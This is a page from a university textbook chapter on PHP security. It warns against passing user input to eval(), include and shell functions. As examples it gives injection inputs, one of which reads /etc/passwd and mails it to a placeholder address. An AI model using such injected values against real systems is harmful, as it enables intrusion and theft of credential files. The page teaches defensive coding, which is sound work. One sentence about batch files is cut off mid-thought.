Page 367 - Open Soource Technologies 304.indd
P. 367
Unit 14: Security
the script running the code. It is not hard to see why this is a problem—type this into the form: Notes
include(‘/etc/passwd’);
Unfortunately, there’s no easy way to ensure that a script like this can ever be secure.
You can globally disable particular function calls by listing them, separated by commas, in the
disable_functions configuration option in php.ini. For example, you may never have need for
the system( ) function, so you can disable it entirely with:
disable_functions = system
This does not make eval( ) any safer, though, as there’s no way to prevent important variables
from being changed or built-in constructs such as echo( ) from being called.
Note that the preg_replace( ) function with the /e option also calls eval( ) on PHP code, so do
not use user-supplied data in the replacement string.
In the case of include, require, include_once, and require_once, your best bet is to turn off remote
file access using allow_url_fopen.
The main message of this is that any use of eval( ) and the /e option with preg_replace( ) is
suspect, especially if you allow users to put bits into the code. Consider the following:
eval(“2 + $user_input”);
It seems pretty innocuous. However, suppose the user enters the following value:
2; mail(“l33t@somewhere.com”, “Some passwords”, `/bin/cat /etc/passwd`);
In this case, both the command you expected and one you’d rather was not will be executed.
The only viable solution is to never give user-supplied data to eval( ).
eval() is a useful but very dangerous function that allows you to execute a
string as PHP code. There are not many occasions where this is neccessary,
and being realistic you should avoid its usage, especially if you want to use
user input in the string.
14.6 Shell Commands
The command shell is a separate software program that provides direct communication
between the user and the operating system. The non-graphical command shell user interface
provides the environment in which you run character-based applications and utilities. The
command shell executes programs and displays their output on the screen by using individual
characters similar to the MS-DOS command interpreter Command.com. The Windows XP
command shell uses the command interpreter Cmd.exe, which loads applications and directs
the flow of information between applications, to translate user input into a form that the
operating system understands.
You can use the command shell to create and edit batch files (also called scripts) to automate
routine tasks. For example, you can use scripts to automate the management of user accounts or
nightly backups. You can also use the Windows Script Host, CScript.exe, to run more sophisticated
scripts in the command shell. You can perform operations more efficiently by using batch files
than you can by using the user interface. Batch files accept all commands that are available at
the command line. For more information about batch files and scripting,
You can customize the command prompt window for easier viewing and to increase control
over how you run programs.
Be very wary of using the exec( ), system( ), passthru( ), and popen( ) functions and the
backtick (``) operator in your code. The shell is a problem because it recognizes special characters
LOVELY PROFESSIONAL UNIVERSITY 361
